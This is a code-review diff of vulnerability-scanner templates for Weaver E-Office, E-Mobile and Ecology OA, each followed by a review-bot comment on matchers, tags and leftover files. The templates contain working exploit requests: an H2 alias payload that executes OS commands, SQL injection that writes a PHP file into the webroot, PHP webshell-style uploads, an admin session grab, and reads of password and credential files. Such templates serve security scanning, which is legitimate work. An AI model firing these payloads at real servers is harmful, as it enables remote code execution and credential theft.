0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d
%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,(4276*908)+order+by+(((1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":"'
- type: word
part: body
words:
- '"text":"'
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
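Review bot: the matchers only require `"id":"` and `"text":"` in the body, which is the normal shape of every `WorkflowCenterTreeData.jsp` tree response, so the template reports a finding even when the `formids` injection was rejected. The request already selects `(4276*908)`; match on the product `3882608` in the body, as the other SQLi templates in this commit do. `description` and the second `reference` say the issue is limited to Oracle-backed installs; add `oracle` to `tags` so users can filter on it.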

View File

@ -0,0 +1,43 @@
id: weaver-e-mobile-client-do-rce
info:
name: weaver-e-mobile-client-do-rce
author: SleepingBag945
severity: critical
description: 泛微E-Mobile 6.0远程命令执行漏洞
reference:
- https://mp.weixin.qq.com/s/z-WN2_MTxdk3z4LvchXkXw
tags: eBridge,weaver,oa,read
http:
- raw:
- |
POST /client.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="method"
getupload
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="uploadID"
1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('ipconfig');--
------WebKitFormBoundary{{randstr}}--
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'Windows IP')
condition: and
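Review bot: `tags: eBridge,weaver,oa,read` is copy-pasted from the E-Bridge file-read templates and is wrong for an E-Mobile remote command execution check; use `e-mobile,weaver,oa,rce,intrusive`. `intrusive` is warranted: the `uploadID` payload runs `CREATE ALIAS if not exists MzSNqKsZTagmf ...` and then `CALL MzSNqKsZTagmf('ipconfig')`, so a scan both executes an OS command on the target and leaves a persistent H2 alias behind; say so in `description` and drop the alias afterwards where the endpoint allows it. Matching on `Windows IP` also means Linux-hosted E-Mobile instances are never reported.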

View File

@ -0,0 +1,34 @@
id: weaver-oa-e-office-group-xml-sqli
info:
name: weaver-oa e-office group_xml sqli
author: SleepingBag945
severity: critical
description: 泛微OA E-Office group_xml.php SQL注入漏洞,可写shell
reference:
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
GET /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /vulntest.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- type: status
status:
- 200
# 可构造exp写入shell
# [group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/vulntest.php']
# /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd
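Review bot: this check writes `vulntest.php` (a `phpinfo()` page) into the target's webroot via `into outfile` and never removes it, so each scan leaves a world-readable information-disclosure page behind under a fixed, guessable name. Tag the template `intrusive`, have the written file print a `{{randstr}}` marker and delete itself instead of exposing `phpinfo`, and name the residual artifact in `description`. The three trailing comments (`可构造exp写入shell`, the decoded payload, and the repeated URL) are exploitation notes rather than template documentation and should go. The `phpinfo` word matcher has no `part:`, and with two requests and no `req-condition` it is unclear which response it applies to; use `req-condition: true` with `body_2`.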

View File

@ -0,0 +1,44 @@
id: weaver-e-office-login-quick-seesionkey
info:
name: weaver-e-office-login-quick-seesionkey
author: zimuzhi
severity: high
description: 泛微OA E-Office login_quick.php 获取登录seesionnkey
tags: weaver,e-office,oa
http:
- raw:
- |
POST /E-mobile/App/System/Login/login_quick.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
identifier=admin
- |
GET /E-mobile/App/Init.php?m=all_Create&detailid=&fromid=&sessionkey={{timestamp}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: timestamp
internal: true
group: 1
regex:
- '\"sessionkey\":\"(.*?)\"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'{{timestamp}}')"
- "status_code_2 == 200 && contains(body_2,'<title>新建')"
condition: and
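Review bot: `seesionkey` in `id`, `name` and `description` (and `seesionnkey` in the description) misspells `sessionkey`; ids are the stable handle other tooling uses, so correct it before merge. The extractor is named `timestamp` although it captures the `sessionkey` value, which is misleading; rename it and the two `{{timestamp}}` references to `sessionkey`. As with `VerifyQuickLogin.jsp`, the check obtains a usable session for `identifier=admin`; tag it `intrusive` and say in `description` that the key is only echoed into the second request.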

View File

@ -0,0 +1,51 @@
id: weaver-e-office-mobile-upload-save-arbitrary-file-upload
info:
name: weaver-e-office-mobile-upload-save-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 泛微e-office存在文件上传漏洞攻击者可利用该漏洞获取服务器控制权。
reference:
- https://forum.butian.net/share/1791
tags: weaver,e-office,oa
http:
- raw:
- |
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynejqegqr
Accept-Encoding: gzip
------WebKitFormBoundarynejqegqr
Content-Disposition: form-data; name="upload_quwan"; filename="{{randstr_1}}.php."
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}"; unlink(__FILE__); ?>
------WebKitFormBoundarynejqegqr--
- |
GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1
Host: 61.184.73.157:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: attachmentID
internal: true
regex:
- "[0-9]{10}"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'[1')"
- "contains(body_2, '{{randstr_2}}') && status_code_2 == 200"
condition: and
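Review bot: the second request hard-codes `Host: 61.184.73.157:8082` instead of `{{Hostname}}`, so on every target other than that address the follow-up `GET /attachment/...` goes out with the wrong Host header, and the literal IP of what looks like a test instance is leaked into the repository; replace it with `{{Hostname}}`. The `attachmentID` extractor `[0-9]{10}` has no `group` and no `part`, so it takes the first ten-digit number found anywhere in headers or body (a `Content-Length`, a timestamp); anchor it to the JSON structure the response actually uses, as the `uploadify` template in this commit does. The PHP stub's `unlink(__FILE__)` is the right call; mention it in `description`.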

View File

@ -0,0 +1,30 @@
id: weaver-oa-e-office-mysql-config-info-leak
info:
name: weaver-oa e-office mysql_config.ini info-leak
author: SleepingBag945
severity: medium
description: 泛微 E-Office mysql_config.ini文件可直接访问泄漏数据库账号密码等信息
reference:
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20mysql_config.ini%20数据库信息泄漏漏洞.html
tags: weaver,e-office,oa,info
http:
- raw:
- |
GET /mysql_config.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- raw:
- |
GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "dataurl") && contains(body_1,"datapassword") && contains(body_1, "datauser")'
- 'status_code_2 == 200 && contains(body_2,"sip") && contains(body_2,"sdbuser") && contains(body_2,"sdbpassword")'
condition: or
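Review bot: the two requests sit in separate `- raw:` blocks, but `req-condition: true` with `body_1`/`body_2` only works when both requests are in the same `raw:` list; as written the second block's DSL cannot see the first response, and the first block has no matchers at all. Move the `jx2_config.ini` request into the first `raw:` list so the `condition: or` actually covers both files.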

View File

@ -0,0 +1,31 @@
id: weaver-oa-e-office-officeserver-arbitrary-file-read
info:
name: weaver-oa e-office officeserver arbitrary file read
author: SleepingBag945
severity: high
description: 泛微OA E-Office officeserver.php 任意文件读取漏洞
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java
tags: weaver,e-office,oa
http:
- raw:
- |
GET /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "datapassword"
- type: word
words:
- "DBSTEP"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

View File

@ -0,0 +1,66 @@
id: weaver-e-office-uploadify-arbitrary-file-upload
info:
name: weaver-e-office-uploadify-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 泛微OA E-Office uploadify.php 任意文件上传漏洞
reference:
- https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
tags: weaver,e-office,oa
http:
- raw:
- |
GET /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
POST /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye
Accept-Encoding: gzip
------WebKitFormBoundaryjetvpuye
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php"
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}";unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: attachmentID
internal: true
group: 1
regex:
- "attachmentID\":(.*?),"
- type: regex
name: attachmentName
internal: true
group: 1
regex:
- "attachmentName\":\"(.*?)\","
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'attachmentID') && status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and
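Review bot: this template and the `...-arbitrary-file-upload2` / `...-upload3` files that follow are identical apart from the `uploadify.php` path and the final fetch, which triples maintenance and triples the number of PHP files written to a target per scan. Consolidate them into one template with a `payloads:` list of the three paths (`attack: batteringram`), or at least share the extractor and matcher logic. The first `GET` contributes only `status_code_1 == 200`; if it is meant to confirm the plugin exists, match on something from that page so a catch-all 200 does not pass it. The `unlink(__FILE__)` in the stub is right; document it in `description`.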

View File

@ -0,0 +1,53 @@
id: weaver-e-office-uploadify-arbitrary-file-upload2
info:
name: weaver-e-office-uploadify-arbitrary-file-upload2
author: SleepingBag945
severity: critical
description: 泛微OA E-Office uploadify.php 任意文件上传漏洞
reference:
- https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
tags: weaver,e-office,oa
http:
- raw:
- |
GET /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
POST /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye
Accept-Encoding: gzip
------WebKitFormBoundaryjetvpuye
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php"
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}";unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/personal/_temp.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'imageSrc') && status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and
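Review bot: the third request fetches a fixed `/attachment/personal/_temp.php`, so the random `{{randstr_1}}.php` name is not what ends up executing, and two scanners hitting the same host concurrently will race on the same file (one's `unlink` breaks the other's check). State the fixed path and this limitation in `description`. This file otherwise duplicates the first `uploadify` template apart from the path; fold it into that template as one more payload.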

View File

@ -0,0 +1,59 @@
id: weaver-e-office-uploadify-arbitrary-file-upload3
info:
name: weaver-e-office-uploadify-arbitrary-file-upload3
author: SleepingBag945
severity: critical
description: 泛微OA E-Office uploadify.php 任意文件上传漏洞
reference:
- https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
tags: weaver,e-office,oa
http:
- raw:
- |
GET /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye
Accept-Encoding: gzip
------WebKitFormBoundaryjetvpuye
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php"
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}";unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: attachmentID
internal: true
regex:
- "[0-9]{10}"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and
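Review bot: `status_code_2 == 200` is weaker than the first `uploadify` template's `contains(body_2, 'attachmentID')` check, and the `attachmentID` extractor `[0-9]{10}` has no `group`/`part`, so any ten-digit number in the response (a `Content-Length`, a timestamp) becomes the path of the third request. Reuse the `attachmentID\":(.*?),` regex from the first template. This file is otherwise a copy of that template with a different path and should be merged into it rather than maintained separately.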

View File

@ -0,0 +1,31 @@
id: weaver-oa-e-office-userselect-unauth
info:
name: weaver-oa e-office userselect unauth
author: SleepingBag945
severity: high
description: 泛微OA E-Office UserSelect 未授权访问漏洞,泛微OA E-Office UserSelect接口存在未授权访问漏洞通过漏洞攻击者可以获取敏感信息
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20UserSelect%20未授权访问漏洞.html
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
GET /UserSelect/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "<title>选择人员</title>"
- type: word
words:
- "/UserSelect/dept.php"
- type: status
status:
- 200
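Review bot: `tags` lists `sqli`, but this template only checks that `/UserSelect/` renders the `选择人员` page and references `dept.php` without authentication; replace `sqli` with `unauth` so the finding is classified correctly. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET is unnecessary and can be dropped.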

View File

@ -0,0 +1,80 @@
id: weaver-oa-e-office-v10-office-server-arbitrary-file-upload
info:
name: weaver-oa e-office-v10 OfficeServer.php arbitrary file upload
author: SleepingBag945
severity: critical
description: 泛微OA E-Office OfficeServer.php 任意文件上传漏洞
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java
- https://github.com/Phuong39/2022-HW-POC/blob/main/泛微%20EOffice10%20前台%20GETSHELL.md
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20OfficeServer.php%20任意文件上传漏洞.html
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew
Upgrade-Insecure-Requests: 1
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FileData";filename="teest.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FormData"
{'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teest.php'}
------WebKitFormBoundaryLpoiBFy4ANA8daew--
- raw:
- |
GET /eoffice10/server/public/iWebOffice2015/Document/teest.php
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- type: status
status:
- 200
# shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php
# POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
# Host: XXXXXXXX:8010
# Content-Length: 378
# Cache-Control: max-age=0
# Upgrade-Insecure-Requests: 1
# Origin: null
# Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
# Gecko) Chrome/91.0.4472.77 Safari/537.36
# Accept:
# text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
# *;q=0.8,application/signed-exchange;v=b3;q=0.9
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
# Connection: close
# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
# Content-Disposition: form-data; name="FileData"; filename="1.jpg"
# Content-Type: image/jpeg
# <?php echo md5(1);?>
# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
# Content-Disposition: form-data; name="FormData"
# {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
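Review bot: the uploaded probe `teest.php` runs `phpinfo()` and is never removed, so every scan leaves an executable file that discloses server configuration on the target; use the uploadify template's pattern from this commit (`{{randstr_1}}.php` echoing `{{randstr_2}}` followed by `unlink(__FILE__)`, matched with `contains(body_3,'{{randstr_2}}')`) so the probe is removed after verification. Three smaller points: the verification line `GET /eoffice10/server/public/iWebOffice2015/Document/teest.php` is missing the ` HTTP/1.1` version token, `tags` carries `sqli` for a file-upload issue, and the twenty-odd commented-out lines of a second raw request with an `XXXXXXXX:8010` host are dead content that should be deleted rather than shipped in the template.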

View File

@ -0,0 +1,33 @@
id: weaver-e-office-xmlrpcservlet-arbitrary-file-read
info:
name: weaver-e-office-xmlrpcservlet-arbitrary-file-read
author: SleepingBag945
severity: high
description: 通过漏洞攻击者可以获取敏感信息
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/xml
Accept-Encoding: gzip
<?xml version="1.0" encoding="UTF-8"?><methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params><param><value><string>/etc/passwd</string>
</value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
words:
- "<methodResponse><params><param><value><base64>"
- type: status
status:
- 200
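Review bot: the `info` block has no `reference`, and the description (`通过漏洞攻击者可以获取敏感信息`, "through this vulnerability an attacker can obtain sensitive information") names neither the product nor the endpoint; state that this is the Weaver E-Office `XmlRpcServlet` `WorkflowService.getAttachment` arbitrary file read and cite a source, as the sibling templates do. `tags` again carries `sqli`, which does not apply to a file-read issue.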

View File

@ -0,0 +1,36 @@
id: weaver-e-weaver-signaturedownload-arbitrary-file-read
info:
name: weaver-e-weaver-signaturedownload-arbitrary-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DriverClasses"
- type: word
part: body
words:
- "ecology.password"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
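Review bot: a positive match on `DriverClasses` and `ecology.password` means the response body returned by `weaver.properties` contains the live database credential, so scan output that stores response bodies (JSON export, debug logs) must be handled as credential material; the template should say so in `description`, or match on a file that does not carry secrets. The trailing `# Enhanced by md on 2022/10/31` comment carries no information for a user of this file; keep provenance in `reference` or drop the comment.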

View File

@ -0,0 +1,29 @@
id: weaver-ecology-oa-plugin-checkserver-setting-sqli
info:
name: 泛微 Ecology OA CheckServer SQL 注入漏洞
author: SleepingBag945
severity: high
description: 泛微 Ecology OA 系统由于对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,远程且未经过身份认证的攻击者可利用此漏洞进行 SQL 注入攻击,从而可窃取数据库敏感信息。
tags: weaver,ecology
http:
- raw:
- |
GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- status_code == 200
- '!contains(header,"securityIntercept")'
- 'contains(header,"application/json")'
- contains(body,"\"error\":\"system error\"")
condition: and
# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
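Review bot: the matcher only checks that `CheckServer.jsp?type=mobileSetting` answers with a JSON `"error":"system error"` body and no `securityIntercept` header, which fingerprints an exposed endpoint rather than confirming the SQL injection the description claims; either describe the template as an exposure check or tighten the DSL to the behaviour that distinguishes a vulnerable build. The trailing comment URL points to a 用友 (Yonyou) `GNRemote.dll` SQL-injection write-up, unrelated to Weaver Ecology; remove it and add the correct source as a `reference` entry, matching the other templates in this commit.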

Some files were not shown because too many files have changed in this diff